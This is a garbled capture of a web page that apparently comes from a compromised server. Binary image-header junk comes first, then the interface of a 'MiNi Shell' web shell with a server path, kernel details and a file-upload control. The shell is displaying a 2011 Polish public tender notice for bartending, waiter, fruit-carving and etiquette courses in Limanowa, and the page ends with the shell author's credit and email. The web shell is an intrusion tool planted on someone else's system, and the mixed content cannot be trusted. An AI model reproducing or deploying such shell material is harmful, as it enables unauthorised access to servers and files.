JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110322/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110322/50714-N-2011.html

<p class="kh_header"><b>Limanowa: Kursy barmańskie i kelnerskie, carvingu, savoir vivre
w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce współfinansowanego przez Unię Europejską w ramach 
Europejskiego Funduszu Społecznego w Powiecie Limanowskim</b><br>
<b>Numer ogłoszenia: 50714 - 2011; data zamieszczenia: 22.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Kształcenia Ustawicznego w Limanowej , ul. Reymonta 3, 34-651 Limanowa, woj. małopolskie, tel. 18 337 61 47, faks 18 337 61 47.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cku.limanowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kursy barmańskie i kelnerskie, carvingu, savoir vivre
w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce współfinansowanego przez Unię Europejską w ramach 
Europejskiego Funduszu Społecznego w Powiecie Limanowskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
Organizację i przeprowadzenie kursów barmańskich i kelnerskich, carvingu oraz savoir vivre dla uczniów w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego w Powiecie Limanowskim.
Liczba kursów:
kurs barmański - 2 grupy 
kurs kelnerski - 3 grupy
kurs carvingu - 8 grup
kurs savoir vivre - 8 grup

Planowana ilość uczniów/uczennic w grupie:
kurs barmański - 10 
kurs kelnerski - 12
kurs carving - 12
kurs savoir vivre - 15

Ilość godzin:
kurs barmański - nie mniej niż 40 h w tym zajęcia praktyczne nie mniej niż 26 h
kurs kelnerski - nie mniej niż 32 h w tym zajęcia praktyczne nie mniej niż 20 h
kurs carvingu - nie mniej niż 16 h w tym zajęcia praktyczne nie mniej niż 14h
kurs savoir vivre - nie mniej niż 16 h w tym zajęcia praktyczne nie mniej niż 8 h
Każdy kurs powinien obejmować zajęcia teoretyczne i praktyczne. Godzina zajęć teoretycznych obejmuje 45 minut zajęć, natomiast godzina zajęć praktycznych obejmuje 60 minut zajęć. Długość przerw jest ustalana w sposób elastyczny przez wykonawcę. Zamawiający zapewni zaplecze lokalowe wraz z dostępem do niezbędnego sprzętu w salach dydaktycznych znajdujących się w siedzibie Zespołu w którym odbywać się będą poszczególne kursy.  
Kursy mogą odbywać w dni robocze oraz w soboty i/lub w niedziele. Dzienna liczba godzin dydaktycznych kursu może wynosić minimum 3 godziny, a maksimum 8 godzin.  Harmonogram kursów musi być dostosowany do planu lekcji kursantów i uzgodniony z liderem szkolnym.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunki udziału w postępowaniu za spełnione, jeżeli Wykonawca:
w zakresie warunku posiadania wiedzy i doświadczenia
wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przeprowadził należycie co najmniej dwa kursy/szkolenia w zakresie odpowiedniej części zamówienia dla co najmniej 10 osób (jeżeli Wykonawca bierze udział we wszystkich częściach zamówienia przedstawia dokumenty, że przeprowadził po dwa kursy: barmańskie, kelnerskie, carvingu i savoir vivre). Wykonawca powinien podać opis prowadzonych kursów, wymiar, wartość, odbiorców, termin realizacji (według załącznika nr 5 do SIWZ). Ponadto Wykonawca musi załączyć dokumenty potwierdzające, że te usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga przedstawienia wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacją na temat ich kwalifikacji zawodowych i doświadczenia (według załącznika nr 2 do SIWZ). Zamawiający wymaga aby Wykonawca dysponował osobami posiadającymi uprawnienia (wiedzę i umiejętności) do prowadzenia kursu zawodowego oraz doświadczenie, w zależności od części na którą złożona została oferta:
Część nr 1:
Minimum jedna osoba do prowadzenia kursów barmańskich o kwalifikacjach: ukończony kurs barmański tj. minimum kurs podstawowy/kurs I go stopnia potwierdzający uzyskanie wiedzy i umiejętności barmańskich. Doświadczenie polegające na  przeprowadzeniu w ostatnich trzech latach przed dniem wszczęcia postępowania co najmniej dwóch kursów barmańskich.
Minimum jedna osoba do prowadzenia kursów kelnerskich o kwalifikacjach: ukończony kurs kelnerski tj. minimum kurs podstawowy lub kurs I go stopnia potwierdzający wiedzę i umiejętności kelnerskie. Doświadczenie polegające na  przeprowadzeniu w ostatnich trzech latach przed dniem wszczęcia postępowania co najmniej dwóch kursów kelnerskich.
Część nr 2:
Minimum dwie osoby do prowadzenia kursów carvingu o kwalifikacjach: ukończony kurs carvingu tj. minimum kurs podstawowy lub kurs I go stopnia potwierdzający wiedzę i umiejętności w zakresie carvingu. Doświadczenie polegające na  przeprowadzeniu w ostatnich trzech latach przed dniem wszczęcia postępowania co najmniej dwóch kursów carvingu.
Część nr 3
Minimum dwie osoby do prowadzenia kursów savoir vivre posiadające doświadczenie polegające na przeprowadzeniu w ostatnich trzech latach przed dniem wszczęcia postępowania co najmniej dwóch kursów savoir vivre lub kursu który w swym zakresie obejmował wiedzę z zakresu savoir vivre.
Zaleca się aby w celu terminowej realizacji zamówienia Wykonawcy, którzy zamierzają złożyć oferty na wszystkie części zamówienia dysponowali osobami w ilości większej niż w podanych wyżej wymaganiach.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cku.limanowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Kształcenia Ustawicznego w Limanowej
ul. Reymonta 3
34-651 Limanowa 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2011 godzina 08:00, miejsce: Centrum Kształcenia Ustawicznego w Limanowej
ul. Reymonta 3
34-651 Limanowa 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - projekt systemowy Programu Operacyjnego Kapitał Ludzki na lata 2007-2013, Działanie 9.2, Modernizacja kształcenia zawodowego w Małopolsce.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> kursy barmańskie i kelnerskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs barmański
1. Zajęcia teoretyczne. Omówienie zawodu barmana. Organizacja pracy za barem. Barmański savoir-vivre. Etyka zawodowa, psychologia klienta. Prezentacja naczyń szklanych. Prezentacja przyrządów pracy barmana. Podział i charakterystyka napojów mieszanych. Podział napojów alkoholowych i bezalkoholowych
2. Na zajęcia praktyczne składają się: czynności organizacyjne w barze, zasady obsługi klienta, technologia przygotowywania napojów mieszanych oraz technika miksowania i nalewania napojów. Przygotowanie drinków na bazie omawianych alkoholi.
3. Egzamin 
 
Kurs kelnerski
1. Zajęcia teoretyczne. Wygląd i prezencja kelnera, cechy osobowe dobrego kelnera, kultura obsługi gości przy stole z elementami wiedzy psychologicznej. Przebieg obsługi gości: powitanie i zajmowanie miejsc przez gości, przyjmowanie zamówienia. Radzenie sobie z trudnym konsumentem, rozwiązywanie konfliktów.
 2. Zajęcia praktyczne. Przygotowanie sali konsumenckiej do obsługi. Techniki nakrywania stołów bielizną stołową. Organizacja pracy kelnera w sali konsumpcyjnej. Technika noszenia naczyń. Sposoby serwowania dań. Zasady obsługi konsumentów. Dekoracja stołu. Karty menu - rodzaje, charakterystyka.  Systemy rozliczeń kelnerskich. Organizacja obsługi przyjęć okolicznościowych, obsługa konferencji, catering.
3. Egzamin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> kursy carvingu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs carvingu
1. Zajęcia teoretyczne. Historia sztuki carvingu. Narzędzia do carvingu, posługiwanie się podstawowym sprzętem, podstawowe cięcia i techniki rzeźbienia. Omówienie sposobów przechowywania i eksponowania kompozycji.
3. Zajęcia praktyczne w zakresie wycinania elementów ozdobnych (liści i kwiatów) z różnych warzyw i owoców oraz tworzenie kompozycji z wyrzeźbionych elementów. Rzeźbienie w owocach i warzywach oraz tworzenie kompozycji z wyrzeźbionych elementów m.in.: dekoracje z pomarańczy, cytryny, jabłka, cebuli, papryki, marchewki, pora, rzodkiewki, cukinii, ogórka, melona, arbuza. Zapoznanie uczestników z techniką, sposobami oraz możliwościami zastosowania carvingu w praktyce.
3. Egzamin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> kursy savoir vivre.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs savoir vivre
1. Normy prawne i moralne. Reguły obyczajowe i kultura dnia codziennego. Zwroty grzecznościowe: pozdrowienia, pożegnania, tytułowanie. Kultura pracy, zwyczaje w kraju i za granicą. Kultura kontaktów z klientami: osobiste, korespondencyjne, telefoniczne. Kultura osobista i zachowanie w sytuacjach zawodowych. Skuteczna komunikacja a błędy komunikacyjne. Zasady pracy w grupie. Sztuka skutecznych negocjacji. Sposoby rozwiązywania konfliktów.  Ubiór i zasady jego doboru. Kultura przy stole. Estetyka stanowiska pracy. 
2. Egzamin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com